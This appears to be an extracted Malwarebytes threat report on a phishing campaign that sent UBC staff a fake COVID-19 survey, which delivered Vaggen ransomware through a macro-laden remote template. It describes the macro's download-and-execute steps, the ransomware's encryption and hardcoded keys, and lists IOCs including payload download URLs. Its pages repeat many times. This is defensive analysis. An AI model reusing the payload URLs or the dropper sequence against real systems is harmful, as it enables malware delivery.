3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2888 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2921 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. 
Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2922 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe: notabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it was successful (the return value is the task ID of the executed application)\r\nIf successful, it sends a GET HTTP request to: canarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET HTTP request to: canarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\n
We were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event. This can be very useful as an early warning notification system that an intruder has had access to a network. In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\n
Vaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -> main_enumDir\r\nmain_ELDBJORT -> main_encryptFile\r\nmain_SPRINGA -> main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\n
Some of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of XXTEA (using the library xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function path/filepath.Walk.\r\n
Files are encrypted with AES-256 (32 byte long key) in GCM mode. The encryption algorithm is similar to the one demonstrated here, using a hardcoded key and a 12 byte long nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 byte long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Using this key, we can easily decrypt the content, since each output file carries its own nonce and GCM tag alongside the ciphertext.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\n
Unusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not. Crawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\n
Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2934 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2935 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2936 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2937 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2938 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2939 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2940 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2941 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2942 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2943 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2944 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2945 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2946 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2947 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2948 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2949 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). 
Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2950 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2951 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2952 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2953 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2954 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2955 of 
